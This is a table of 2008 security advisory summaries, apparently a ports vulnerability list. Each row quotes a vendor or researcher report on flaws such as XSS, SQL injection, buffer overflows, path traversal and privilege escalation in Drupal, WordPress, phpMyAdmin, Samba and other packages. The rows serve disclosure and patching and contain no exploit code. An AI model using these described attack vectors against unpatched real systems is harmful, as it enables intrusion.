| 2008-10-25 | The Flyspray Project reports: Flyspray is affected by a Cross Site scripting Vulnerability due to an error escaping PHP's $_SERVER['QUERY_STRING'] superglobal, that can be maliciously used to inject arbitrary code into the savesearch() javascript function. There is an XSS problem in the history tab, the application fails to sanitize the "details" parameter correctly, leading to the possibility of arbitrary code injection into the getHistory() javascript function. Flyspray is affected by a Cross Site scripting Vulnerability due missing escaping of SQL error messages. By including HTML code in a query and at the same time causing it to fail by submitting invalid data, an XSS hole can be exploited. There is an XSS problem in the task history attached to comments, since the application fails to sanitize the old_value and new_value database fields for changed task summaries. Input passed via the "item_summary" parameter to "index.php?do=details" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | flyspray |
| 2008-10-24 | The Wordpress development team reports: A vulnerability in the Snoopy library was announced today. WordPress uses Snoopy to fetch the feeds shown in the Dashboard. Although this seems to be a low risk vulnerability for WordPress users, we wanted to get an update out immediately. more... | de-wordpress wordpress wordpress-mu |
| 2008-10-22 | The Drupal Project reports: On a server configured for IP-based virtual hosts, Drupal may be caused to include and execute specifically named files outside of its root directory. This bug affects both Drupal 5 and Drupal 6. The title of book pages is not always properly escaped, enabling users with the "create book content" permission or the permission to edit any node in the book hierarchy to insert arbitrary HTML and script code into pages. Such a Cross site scripting attack may lead to the attacker gaining administrator access. This bug affects Drupal 6. more... | drupal5 drupal6 |
| 2008-10-22 | The Wordpress development team reports: With open registration enabled, it is possible in WordPress versions 2.6.1 and earlier to craft a username such that it will allow resetting another users password to a randomly generated password. The randomly generated password is not disclosed to the attacker, so this problem by itself is annoying but not a security exploit. However, this attack coupled with a weakness in the random number seeding in mt_rand() could be used to predict the randomly generated password. more... | de-wordpress wordpress wordpress-mu zh-wordpress |
| 2008-10-20* | Secunia reports: Two vulnerabilities have been reported in Libxml2, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise an application using the library. 1) A recursion error exists when processing certain XML content. This can be exploited to e.g. exhaust all available memory and CPU resources by tricking an application using Libxml2 into processing specially crafted XML documents. 2) A boundary error in the processing of long XML entity names in parser.c can be exploited to cause a heap-based buffer overflow when specially crafted XML content is parsed. Successful exploitation may allow execution of arbitrary code. more... | libxml2 |
| 2008-10-19 | xine team reports: A new xine-lib version is now available. This release contains some security fixes, notably a DoS via corrupted Ogg files (CVE-2008-3231), some related fixes, and fixes for a few possible buffer overflows. more... | libxine |
| 2008-10-17 | Adobe Product Security Incident Response Team reports: Potential vulnerabilities have been identified in Adobe Flash Player 9.0.124.0 and earlier that could allow an attacker who successfully exploits these potential vulnerabilities to bypass Flash Player security controls. Adobe recommends users update to the most current version of Flash Player available for their platform. more... | linux-flashplugin |
| 2008-10-12 | The Drupal Project reports: A logic error in the core upload module validation allowed unprivileged users to attach files to content. Users can view files attached to content which they do not otherwise have access to. If the core upload module is not enabled, your site will not be affected. A deficiency in the user module allowed users who had been blocked by access rules to continue logging into the site under certain conditions. If you do not use the 'access rules' functionality in core, your site will not be affected. The BlogAPI module does not implement correct validation for certain content fields, allowing for values to be set for fields which would otherwise be inaccessible on an internal Drupal form. We have hardened these checks in BlogAPI module for this release, but the security team would like to re-iterate that the 'Administer content with BlogAPI' permission should only be given to trusted users. If the core BlogAPI module is not enabled, your site will not be affected. A weakness in the node module API allowed for node validation to be bypassed in certain circumstances for contributed modules implementing the API. Additional checks have been added to ensure that validation is performed in all cases. This vulnerability only affects sites using one of a very small number of contributed modules, all of which will continue to work correctly with the improved API. None of them were found vulnerable, so our correction is a preventative measure. more... | drupal5 drupal6 |
| 2008-10-10 | The release note of cups 1.3.9 reports: It contains the following fixes: SECURITY: The HP-GL/2 filter did not range check pen numbers (STR #2911) SECURITY: The SGI image file reader did not range check 16-bit run lengths (STR #2918) SECURITY: The text filter did not range check cpi, lpi, or column values (STR #2919) Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service. more... | cups-base |
| 2008-10-10* | Thomas Henlich reports: The mysql command-line client does not quote HTML special characters like < in its output. This allows an attacker who is able to write data into a table to hide or modify records in the output, and to inject potentially dangerous code, e. g. Javascript to perform cross-site scripting or cross-site request forgery attacks. more... | mysql-client |
| 2008-10-10* | SecurityFocus reports: MySQL is prone to a security-bypass vulnerability. An attacker can exploit this issue to overwrite existing table files in the MySQL data directory, bypassing certain security restrictions. more... | mysql-server |
| 2008-10-03* | Secunia reports: Some security issues have been reported in BitlBee, which can be exploited by malicious people to bypass certain security restrictions and hijack accounts. The security issues are caused due to unspecified errors, which can be exploited to overwrite existing accounts. more... | bitlbee |
| 2008-10-03* | Secunia reports: The vulnerability is caused due to the application truncating an overly long FTP command, and improperly interpreting the remainder string as a new FTP command. This can be exploited to execute arbitrary FTP commands with the privileges of another user by e.g. tricking the user into following malicious link. more... | proftpd proftpd-devel proftpd-mysql |
| 2008-10-03* | Secunia reports: An error exists in the "PMA_escapeJsString()" function in libraries/js_escape.lib.php, which can be exploited to bypass certain filters and execute arbitrary HTML and script code in a user's browser session in context of an affected site when e.g. Microsoft Internet Explorer is used. more... | phpMyAdmin |
| 2008-10-03* | Secunia reports: An error in the handing of ZIP archives with symbolic links can be exploited to disclose the contents of arbitrary files. Input from uploaded Flash animations is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when the malicious data is viewed. more... | gallery gallery2 |
| 2008-10-03* | Secunia reports: Some vulnerabilities have been reported in various Horde products, which can be exploited by malicious people to conduct script insertion attacks Input via MIME attachment linking is not properly sanitised in the MIME library before being used. This can be exploited to execute arbitrary HTML and script code in a user's browser session if e.g. a malicious email is viewed. Certain unspecified input in HTML messages is not properly sanitised before being used. This can be exploited to execute arbitrary HTML and script in a user's browser session if e.g. a malicious HTML email is viewed. more... | horde-base |
| 2008-10-03* | Secunia reports: Some vulnerabilities have been reported in TikiWiki, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks and disclose potentially sensitive information. Input passed to the username parameter in tiki-remind_password.php (when remind is set to send me my password) is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code (for example with meta refreshes to a javascript: URL) in a user's browser session in context of an affected site. Input passed to the local_php and error_handler parameters in tiki-index.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. Input passed to the imp_language parameter in tiki-imexport_languages.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. Certain img src elements are not properly santised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when the malicious data is viewed. more... | tikiwik |
| 2008-10-03* | Secunia reports: The vulnerability is caused due to predictable DNS "Transaction ID" field in DNS queries and can be exploited to poison the DNS cache of an application using the library if a valid ID is guessed. more... | c-ares |
| 2008-10-02* | The oCERT team reports: The MPlayer multimedia player suffers from a vulnerability which could result in arbitrary code execution and at the least, in unexpected process termination. Three integer underflows located in the Real demuxer code can be used to exploit a heap overflow, a specific video file can be crafted in order to make the stream_read function reading or writing arbitrary amounts of memory. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2008-09-26* | Secuna Research reports: Secunia Research has discovered a vulnerability in Samba, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within the "send_mailslot()" function. This can be exploited to cause a stack-based buffer overflow with zero bytes via a specially crafted "SAMLOGON" domain logon packet containing a username string placed at an odd offset followed by an overly long GETDC string. Successful exploitation allows execution of arbitrary code, but requires that the "domain logons" option is enabled. more... | ja-samba samba samba3 |
| 2008-09-26* | The Samba Team reports: Secunia Research reported a vulnerability that allows for the execution of arbitrary code in nmbd. This defect may only be exploited when the "wins support" parameter has been enabled in smb.conf. Samba developers have discovered what is believed to be a non-exploitable buffer over in nmbd during the processing of GETDC logon server requests. This code is only used when the Samba server is configured as a Primary or Backup Domain Controller. more... | ja-samba samba samba3 |
| 2008-09-26* | The Samba development team reports: The idmap_ad.so library provides an nss_info extension to Winbind for retrieving a user's home directory path, login shell and primary group id from an Active Directory domain controller. This functionality is enabled by defining the "winbind nss info" smb.conf option to either "sfu" or "rfc2307". Both the Windows "Identity Management for Unix" and "Services for Unix" MMC plug-ins allow a user to be assigned a primary group for Unix clients that differs from the user's Windows primary group. When the rfc2307 or sfu nss_info plugin has been enabled, in the absence of either the RFC2307 or SFU primary group attribute, Winbind will assign a primary group ID of 0 to the domain user queried using the getpwnam() C library call. more... | samba |
| 2008-09-26* | The Samba Team reports: A bug in the local SID/Name translation routines may potentially result in a user being able to issue SMB/CIFS protocol operations as root. When translating SIDs to/from names using Samba local list of user and group accounts, a logic error in the smbd daemon's internal security stack may result in a transition to the root user id rather than the non-root user. The user is then able to temporarily issue SMB/CIFS protocol operations as the root user. This window of opportunity may allow the attacker to establish additional means of gaining root access to the server. Various bugs in Samba's NDR parsing can allow a user to send specially crafted MS-RPC requests that will overwrite the heap space with user defined data. Unescaped user input parameters are passed as arguments to /bin/sh allowing for remote command execution. This bug was originally reported against the anonymous calls to the SamrChangePassword() MS-RPC function in combination with the "username map script" smb.conf option (which is not enabled by default). After further investigation by Samba developers, it was determined that the problem was much broader and impacts remote printer and file share management as well. The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking externals scripts defined in smb.conf. However, unlike the "username map script" vulnerability, the remote file and printer management scripts require an authenticated user session. more... | ja-samba samba |
| 2008-09-26* | Greg MacManus, iDEFENSE Labs reports: Remote exploitation of an integer overflow vulnerability in the smbd daemon included in Samba 2.0.x, Samba 2.2.x, and Samba 3.0.x prior to and including 3.0.9 could allow an attacker to cause controllable heap corruption, leading to execution of arbitrary commands with root privileges. Successful remote exploitation allows an attacker to gain root privileges on a vulnerable system. In order to exploit this vulnerability an attacker must possess credentials that allow access to a share on the Samba server. Unsuccessful exploitation attempts will cause the process serving the request to crash with signal 11, and may leave evidence of an attack in logs. more... | ja-samba samba |
| 2008-09-26* | Caused by improper bounds checking of certain trans2 requests, there is a possible buffer overrun in smbd. The attacker needs to be able to create files with very specific Unicode filenames on the share to take advantage of this issue. more... | samba |
| 2008-09-26* | Karol Wiesek at iDEFENSE reports: A remote attacker could cause an smbd process to consume abnormal amounts of system resources due to an input validation error when matching filenames containing wildcard characters. Although samba.org classifies this as a DoS vulnerability, several members of the security community believe it may be exploitable for arbitrary code execution. more... | samba |
| 2008-09-26* | According to a Samba Team security notice: A security vulnerability has been located in Samba 2.2.x more... | ja-samba samba |
| 2008-09-26* | Code found in nmbd and smbd may allow a remote attacker to effectively crash the nmbd server or use the smbd server to exhaust the system memory. more... | samba3 |
| 2008-09-26* | Evgeny Demidov discovered that the Samba server has a buffer overflow in the Samba Web Administration Tool (SWAT) on decoding Base64 data during HTTP Basic Authentication. Versions 3.0.2 through 3.0.4 are affected. Another buffer overflow bug has been found in the code used to support the "mangling method = hash" smb.conf option. The default setting for this parameter is "mangling method = hash2" and therefore not vulnerable. Versions between 2.2.0 through 2.2.9 and 3.0.0 through 3.0.4 are affected. more... | ja-samba samba |
| 2008-09-23 | Hanno Boeck reports: When configuring a web application to use only ssl (e.g. by forwarding all http-requests to https), a user would expect that sniffing and hijacking the session is impossible. Though, for this to be secure, one needs to set the session cookie to have the secure flag. Else the cookie will be transferred through http if the victim's browser does a single http-request on the same domain. Squirrelmail does not set that flag. It is fixed in the 1.5 test versions, but current 1.4.15 is vulnerable. more... | squirrelmail |
| 2008-09-17 | A phpMyAdmin security announcement: The server_databases.php script was vulnerable to an attack coming from a user who is already logged-on to phpMyAdmin, where he can execute shell code (if the PHP configuration permits commands like exec). more... | phpMyAdmin |
| 2008-09-17* | A phpMyAdmin security announcement: A logged-in user, if abused into clicking a crafted link or loading an attack page, would create a database he did not intend to, or would change his connection character set. more... | phpMyAdmin |
| 2008-09-17* | Secunia report: Some vulnerabilities have been reported in phpMyAdmin, which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via unspecified parameters to files in /libraries is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation requires that "register_globals" is enabled and support for ".htaccess" files is disabled. more... | phpMyAdmin |
| 2008-09-17* | A phpMyAdmin security announcement report: It is possible to read the contents of any file that the web server's user can access. The exact mechanism to achieve this won't be disclosed. If a user can upload on the same host where phpMyAdmin is running a PHP script that can read files with the rights of the web server's user, the current advisory does not describe an additional threat. more... | phpMyAdmin |
| 2008-09-17* | A phpMyAdmin security announcement report: phpMyAdmin saves sensitive information like the MySQL username and password and the Blowfish secret key in session data, which might be unprotected on a shared host. more... | phpMyAdmin |
| 2008-09-17* | A phpMyAdmin security announcement report: phpMyAdmin used the $_REQUEST superglobal as a source for its parameters, instead of $_GET and $_POST. This means that on most servers, a cookie with the same name as one of phpMyAdmin's parameters can interfere. Another application could set a cookie for the root path "/" with a "sql_query" name, therefore overriding the user-submitted sql_query because by default, the $_REQUEST superglobal imports first GET, then POST then COOKIE data. Mitigation factor An attacker must trick the victim into visiting a page on the same web server where he has placed code that creates a malicious cookie. more... | phpMyAdmin |
| 2008-09-14 | Th1nk3r reports: The version of TWiki installed on the remote host allows access to the 'configure' script and fails to sanitize the 'image' parameter of that script of directory traversal sequences before returning the file contents when the 'action' parameter is set to 'image'. An unauthenticated attacker can leverage this issue to view arbitrary files on the remote host subject to the privileges of the web server user id. . more... | twiki |
| 2008-09-12 | Joe Orton reports: A NULL pointer deference in the Digest authentication support in neon versions 0.28.0 through 0.28.2 inclusive allows a malicious server to crash a client application, resulting in possible denial of service. more... | neon28 |
| 2008-09-12 | Hanno Boeck reports: A fuzzing test showed weakness in the chm parser of clamav, which can possibly be exploited. The clamav team has disabled the chm module in older versions though freshclam updates and has released 0.94 with a fixed parser. more... | clamav clamav-devel |
| 2008-09-10 | Secunia reports: Some vulnerabilities have been reported in Python, where some have unknown impact and others can potentially be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a vulnerable system. Various integer overflow errors exist in core modules e.g. stringobject, unicodeobject, bufferobject, longobject, tupleobject, stropmodule, gcmodule, mmapmodule. An integer overflow in the hashlib module can lead to an unreliable cryptographic digest results. Integer overflow errors in the processing of unicode strings can be exploited to cause buffer overflows on 32-bit systems. An integer overflow exists in the PyOS_vsnprintf() function on architectures that do not have a "vsnprintf()" function. An integer underflow error in the PyOS_vsnprintf() function when passing zero-length strings can lead to memory corruption. more... | python23 python24 python25 |
| 2008-09-08* | Secunia reports: A vulnerability has been reported in Nagios, which can be exploited by malicious people to conduct cross-site scripting attacks. more... | nagios nagios-devel |
| 2008-09-04* | According to Maksymilian Arciemowicz research, it is possible to bypass security restrictions of safe_mode in various functions via directory traversal vulnerability. The attacker can use this attack to gain access to sensitive information. Functions utilizing expand_filepath() may be affected. It should be noted that this vulnerability is not considered to be serious by the FreeBSD Security Team, since safe_mode and open_basedir are insecure by design and should not be relied upon. more... | php5 |
| 2008-08-21 | Secunia reports: A vulnerability has been reported in GnuTLS, which can potentially be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a use-after-free error when an application calls "gnutls_handshake()" for an already valid session and can potentially be exploited, e.g. during re-handshakes. more... | gnutls |
| 2008-08-20* | Joomla project reports: A flaw in the reset token validation mechanism allows for non-validating tokens to be forged. This will allow an unauthenticated, unauthorized user to reset the password of the first enabled user (lowest id). Typically, this is an administrator user. Note, that changing the first users username may lessen the impact of this exploit (since the person who changed the password does not know the login associated with the new password). However, the only way to completely rectify the issue is to upgrade to 1.5.6 (or patch the /components/com_user/models/reset.php file). more... | joomla15 |
| 2008-08-19 | NASA Goddard Space Flight Center reports: The libraries for the scientific data file format, Common Data Format (CDF) version 3.2 and earlier, have the potential for a buffer overflow vulnerability when reading specially-crafted (invalid) CDF files. If successful, this could trigger execution of arbitrary code within the context of the CDF-reading program that could be exploited to compromise a system, or otherwise crash the program. While it's unlikely that you would open CDFs from untrusted sources, we recommend everyone upgrade to the latest CDF libraries on their systems, including the IDL and Matlab plugins. Most worrisome is any service that enables the general public to submit CDF files for processing. The vulnerability is in the CDF library routines not properly checking the length tags on a CDF file before copying data to a stack buffer. Exploitation requires the user to explicitly open a specially-crafted file. CDF users should not open files from untrusted third parties until the patch is applied (and continue then to exercise normal caution for files from untrusted third parties). more... | cdf3 |
| 2008-08-19* | A Bugzilla Security Advisory reports: When importing bugs using importxml.pl, the --attach_path option can be specified, pointing to the directory where attachments to import are stored. If the XML file being read by importxml.pl contains a malicious ../relative_path/to/local_file node, the script follows this relative path and attaches the local file pointed by it to the bug, making the file public. The security fix makes sure the relative path is always ignored. more... | bugzilla ja-bugzilla |
| 2008-08-18 | The Drupal Project reports: A bug in the output filter employed by Drupal makes it possible for malicious users to insert script code into pages (cross site scripting or XSS). A bug in the private filesystem trusts the MIME type sent by the browser, enabling malicious users with the ability to upload files to execute cross site scripting attacks. The BlogAPI module does not validate the extension of uploaded files, enabling users with the "administer content with blog api" permission to upload harmful files. This bug affects both Drupal 5.x and 6.x. Drupal forms contain a token to protect against cross site request forgeries (CSRF). The token may not be validated properly for cached forms and forms containing AHAH elements. This bug affects Drupal 6.x. User access rules can be added or deleted upon accessing a properly formatted URL, making such modifications vulnerable to cross site request forgeries (CSRF). This may lead to unintended addition or deletion of an access rule when a sufficiently privileged user visits a page or site created by a malicious person. This bug affects both Drupal 5.x and 6.x. The Upload module in Drupal 6 contains privilege escalation vulnerabilities for users with the "upload files" permission. This can lead to users being able to edit nodes which they are normally not allowed to, delete any file to which the webserver has sufficient rights, and download attachments of nodes to which they have no access. Harmful files may also be uploaded via cross site request forgeries (CSRF). These bugs affect Drupal 6.x. more... | drupal5 drupal6 |
| 2008-08-07 | James Yonan reports: Security Fix - affects non-Windows OpenVPN clients running OpenVPN 2.1-beta14 through 2.1-rc8 (OpenVPN 2.0.x clients are NOT vulnerable nor are any versions of the OpenVPN server vulnerable). An OpenVPN client connecting to a malicious or compromised server could potentially receive an "lladdr" or "iproute" configuration directive from the server which could cause arbitrary code execution on the client. A successful attack requires that (a) the client has agreed to allow the server to push configuration directives to it by including "pull" or the macro "client" in its configuration file, (b) the client succesfully authenticates the server, (c) the server is malicious or has been compromised and is under the control of the attacker, and (d) the client is running a non-Windows OS. more... | openvpn-devel |
| 2008-08-04* | A KDE Security Advisory reports: Kommander executes without user confirmation data files from possibly untrusted locations. As they contain scripts, the user might accidentally run arbitrary code. Impact: Remotly supplied kommander files from untrusted sources are executed without confirmation. more... | kdewebdev |
| 2008-07-13 | The Drupal Project reports: Free tagging taxonomy terms can be used to insert arbitrary script and HTML code (cross site scripting or XSS) on node preview pages. A successful exploit requires that the victim selects a term containing script code and chooses to preview the node. This issue affects Drupal 6.x only. Some values from OpenID providers are output without being properly escaped, allowing malicious providers to insert arbitrary script and HTML code (XSS) into user pages. This issue affects Drupal 6.x only. filter_xss_admin() has been hardened to prevent use of the object HTML tag in administrator input. Translated strings (5.x, 6.x) and OpenID identities (6.x) are immediately deleted upon accessing a properly formatted URL, making such deletion vulnerable to cross site request forgeries (CSRF). This may lead to unintended deletion of translated strings or OpenID identities when a sufficiently privileged user visits a page or site created by a malicious person. When contributed modules such as Workflow NG terminate the current request during a login event, user module is not able to regenerate the user's session. This may lead to a session fixation attack, when a malicious user is able to control another users' initial session ID. As the session is not regenerated, the malicious user may use the 'fixed' session ID after the victim authenticates and will have the same access. This issue affects both Drupal 5 and Drupal 6. Schema API uses an inappropriate placeholder for 'numeric' fields enabling SQL injection when user-supplied data is used for such fields.This issue affects Drupal 6 only. more... | drupal5 drupal6 |
| 2008-07-09 | Felipe Andres Manzano reports: The libpoppler pdf rendering library, can free uninitialized pointers, leading to arbitrary code execution. This vulnerability results from memory management bugs in the Page class constructor/destructor. more... | poppler |
| 2008-07-04 | Pylons team reports: The error.py controller uses paste.fileapp to serve the static resources to the browser. The default error.py controller uses os.path.join to combine the id from Routes with the media path. Routes prior to 1.8 double unquoted the PATH_INFO, resulting in FileApp returning files from the filesystem that can be outside of the intended media path directory. An attacker can craft URL's which utilize the double escaping to pass in a name to the error.py controller which contains a leading slash thus escaping the intended media path and serving files from any location on the filesystem that the Pylons application has access to. more... | py24-pylons |
| 2008-07-03 | Secunia reports: An integer overflow error exists in the processing of PFB font files. This can be exploited to cause a heap-based buffer overflow via a PFB file containing a specially crafted "Private" dictionary table. An error in the processing of PFB font files can be exploited to trigger the "free()" of memory areas that are not allocated on the heap. An off-by-one error exists in the processing of PFB font files. This can be exploited to cause a one-byte heap-based buffer overflow via a specially crafted PFB file. An off-by-one error exists in the implementation of the "SHC" instruction while processing TTF files. This can be exploited to cause a one-byte heap-based buffer overflow via a specially crafted TTF file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. more... | freetype2 |
| 2008-07-01 | Matthias Andree reports: 2008-06-24 1.2 also fixed issue in report_complete (reported by Petr Uzel) more... | fetchmail |
| 2008-06-28* | The Squid-2.5 patches page notes: If a certain malformed SNMP request is received squid restarts with a Segmentation Fault error. This only affects squid installations where SNMP is explicitly enabled via "make config". As a workaround, SNMP can be disabled by defining "snmp_port 0" in squid.conf. Squid security advisory SQUID-2008:1 explains that Squid-3 versions up to and including Squid-3.0.STABLE6 are affected by this error, too. more... | squid |
| 2008-06-24 | Apache HTTP server project reports: The following potential security flaws are addressed: CVE-2008-2364: mod_proxy_http: Better handling of excessive interim responses from origin server to prevent potential denial of service and high memory usage. Reported by Ryujiro Shibuya. CVE-2007-6420: mod_proxy_balancer: Prevent CSRF attacks against the balancer-manager interface more... | apache |
| 2008-06-21 | Rdancer.org reports: Improper quoting in some parts of Vim written in the Vim Script can lead to arbitrary code execution upon opening a crafted file. more... | vim vim-lite vim-ruby vim6 vim6-ruby |
| 2008-06-21 | The official ruby site reports: Multiple vulnerabilities in Ruby may lead to a denial of service (DoS) condition or allow execution of arbitrary code. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma ruby_static |
| 2008-06-21* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. MFSA 2007-25 XPCNativeWrapper pollution MFSA 2007-24 Unauthorized access to wyciwyg:// documents MFSA 2007-21 Privilege escalation using an event handler attached to an element not in the document MFSA 2007-20 Frame spoofing while window is loading MFSA 2007-19 XSS using addEventListener and setTimeout MFSA 2007-18 Crashes with evidence of memory corruption more... | firefox firefox-ja linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird mozilla mozilla-thunderbird seamonkey thunderbird |
| 2008-06-20 | Matthias Andree reports: Gunter Nau reported fetchmail crashing on some messages; further debugging by Petr Uzel and Petr Cerny at Novell/SUSE Czech Republic dug up that this happened when fetchmail was trying to print, in -v -v verbose level, headers exceeding 2048 bytes. In this situation, fetchmail would resize the buffer and fill in further parts of the message, but forget to reinitialize its va_list typed source pointer, thus reading data from a garbage address found on the stack at addresses above the function arguments the caller passed in; usually that would be the caller's stack frame. more... | fetchmail |
| 2008-06-15 | Matthieu Herrb of X.Org reports: Several vulnerabilities have been found in the server-side code of some extensions in the X Window System. Improper validation of client-provided data can cause data corruption. Exploiting these overflows will crash the X server or, under certain circumstances allow the execution of arbitray machine code. When the X server is running with root privileges (which is the case for the Xorg server and for most kdrive based servers), these vulnerabilities can thus also be used to raise privileges. All these vulnerabilities, to be exploited successfully, require either an already established connection to a running X server (and normally running X servers are only accepting authenticated connections), or a shell access with a valid user on the machine where the vulnerable server is installed. more... | xorg-server |
| 2008-06-15* | MoinMoin team reports: A check in the userform processing was not working as expected and could be abused for ACL and superuser privilege escalation. more... | moinmoin |
| 2008-06-13 | Secunia reports: A vulnerability has been reported in the Courier Authentication Library, which can be exploited by malicious people to conduct SQL injection attacks. Input passed via e.g. the username to the library is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and e.g. potentially bypass authentication. Successful exploitation requires that a MySQL database is used for authentication and that a Non-Latin character set is selected. more... | courier-authlib |
| 2008-06-01 | The ikiwiki development team reports: Until version 2.48, ikiwiki stored passwords in cleartext in the userdb. That risks exposing all users' passwords if the file is somehow exposed. To pre-emtively guard against that, current versions of ikiwiki store password hashes (using Eksblowfish). more... | ikiwiki |
| 2008-05-31 | The ikiwiki development team reports: This hole allowed ikiwiki to accept logins using empty passwords to openid accounts that didn't use a password. Upgrading to a non-vulnerable ikiwiki version immediatly is recommended if your wiki allows both password and openid logins. more... | ikiwiki |
| 2008-05-30 | Adobe Product Security Incident Response Team reports: An exploit appears to be taking advantage of a known vulnerability, reported by Mark Dowd of the ISS X-Force and wushi of team509, that was resolved in Flash Player 9.0.124.0 (CVE-2007-0071). This exploit does NOT appear to include a new, unpatched vulnerability as has been reported elsewhere - customers with Flash Player 9.0.124.0 should not be vulnerable to this exploit. more... | linux-flashplugin |
| 2008-05-27 | Spamdyke Team reports: Fixed smtp_filter() to reject the DATA command if no valid recipients have been specified. Otherwise, a specific scenario could result in every spamdyke installation being used as an open relay. If the remote server connects and gives one or more recipients that are rejected (for relaying or blacklisting), then gives the DATA command, spamdyke will ignore all other commands, assuming that message data is being transmitted. However, because all of the recipients were rejected, qmail will reject the DATA command. From that point on, the remote server can give as many recipients as it likes and spamdyke will ignore them all -- they will not be filtered at all. After that, the remote server can give the DATA command and send the actual message data. Because spamdyke is controlling relaying, the RELAYCLIENT environment variable is set and qmail won't check for relaying either. Thanks to Mirko Buffoni for reporting this one. more... | spamdyke |
| 2008-05-21 | Nico Golde discovered that PeerCast, a P2P audio and video streaming server, is vulnerable to a buffer overflow in the HTTP Basic Authentication code, allowing a remote attacker to crash PeerCast or execure arbitrary code. more... | peercast |
| 2008-05-17 | Red Hat reports: Will Drewry of the Google Security Team reported several flaws in the way libvorbis processed audio data. An attacker could create a carefully crafted [Vorbis] audio file in such a way that it could cause an application linked with libvorbis to crash, or execute arbitrary code when it was opened. more... | libvorbis |
| 2008-05-14 | Django project reports: The Django administration application will, when accessed by a user who is not sufficiently authenticated, display a login form and ask the user to provide the necessary credentials before displaying the requested page. This form will be submitted to the URL the user attempted to access, by supplying the current request path as the value of the form's "action" attribute. The value of the request path was not being escaped, creating an opportunity for a cross-site scripting (XSS) attack by leading a user to a URL which contained URL-encoded HTML and/or JavaScript in the request path. more... | py23-django py23-django-devel py24-django py24-django-devel py25-django py25-django-devel |
| 2008-05-11 | Secunia reports: A vulnerability has been reported in vorbis-tools, which can potentially be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an input validation error when processing Speex headers, which can be exploited via a specially crafted Speex stream containing a negative "modeID" field in the header. Successful exploitation may allow execution of arbitrary code. more... | vorbis-tools |
| 2008-05-08 | Secunia reports: A vulnerability has been reported in QEMU, which can be exploited by malicious, local users to bypass certain security restrictions. The vulnerability is caused due to the "drive_init()" function in vl.c determining the format of a disk from data contained in the disk's header. This can be exploited by a malicious user in a guest system to e.g. read arbitrary files on the host by writing a fake header to a raw formatted disk image. more... | qemu qemu-devel |
| 2008-05-07 | Secunia reports: A vulnerability has been reported in swfdec, which can be exploited by malicious people to disclose sensitive information. The vulnerability is caused due to swfdec not properly restricting untrusted sandboxes from reading local files, which can be exploited to disclose the content of arbitrary local files by e.g. tricking a user into visiting a malicious website. more... | swfdec |
| 2008-05-02 | FrSIRT reports: A vulnerability has been identified in mt-daapd which could be exploited by remote attackers to cause a denial of service or compromise an affected system. This issue is caused by a buffer overflow error in the ws_getpostvars() function when processing a negative Content-Length: header value, which could be exploited by remote unauthenticated attackers to crash an affected application or execute arbitrary code. more... | mt-daapd |
| 2008-05-02 | Secunia reports: Two vulnerabilities have been reported in SDL_image, which can be exploited by malicious people to cause a Denial of Service or potentially compromise an application using the library. A boundary error within the LWZReadByte() function in IMG_gif.c can be exploited to trigger the overflow of a static buffer via a specially crafted GIF file. A boundary error within the "IMG_LoadLBM_RW()" function in IMG_lbm.c can be exploited to cause a heap-based buffer overflow via a specially crafted IFF ILBM file. more... | sdl_image |
| 2008-05-02* | CVE reports: Integer overflow in PHP 5.2.5 and earlier allows context-dependent attackers to cause a denial of service and possibly have unspecified other impact via a printf format parameter with a large width specifier, related to the php_sprintf_appendstring function in formatted_print.c and probably other functions for formatted strings (aka *printf functions). more... | php5 |
| 2008-04-29* | Secunia reports: A vulnerability has been reported in GnuPG, which can potentially be exploited to compromise a vulnerable system. The vulnerability is caused due to an error when importing keys with duplicated IDs. This can be exploited to cause a memory corruption when importing keys via --refresh-keys or --import. Successful exploitation potentially allows execution of arbitrary code, but has not been proven yet. more... | gnupg |
| 2008-04-29* | Secunia reports: Tavis Ormandy has reported a vulnerability in libpng, which can be exploited by malicious people to cause a Denial of Service, disclose potentially sensitive information, or potentially compromise an application using the library. The vulnerability is caused due to the improper handling of PNG chunks unknown to the library. This can be exploited to trigger the use of uninitialized memory in e.g. a free() call via unknown PNG chunks having a length of zero. Successful exploitation may allow execution of arbitrary code, but requires that the application calls the png_set_read_user_chunk_fn() function or the png_set_keep_unknown_chunks() function under specific conditions. more... | png |
| 2008-04-28* | Justin Ferguson reports: Integer signedness error in the zlib extension module in Python 2.5.2 and earlier allows remote attackers to execute arbitrary code via a negative signed integer, which triggers insufficient memory allocation and a buffer overflow. more... | python23 python24 python25 |
| 2008-04-25 | Extmail team reports: Emergency update #4 fixes a serious security vulnerability. Successful exploit of this vulnerability would allow attacker to change user's password without knowing it by using specifically crafted HTTP request. more... | extman |
| 2008-04-25 | Secunia reports: A vulnerability has been reported in Mailman, which can be exploited by malicious users to conduct script insertion attacks. Certain input when editing the list templates and the list info attribute is not properly sanitised before being stored. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when the malicious website is accessed. more... | ja-mailman mailman mailman-with-htdig |
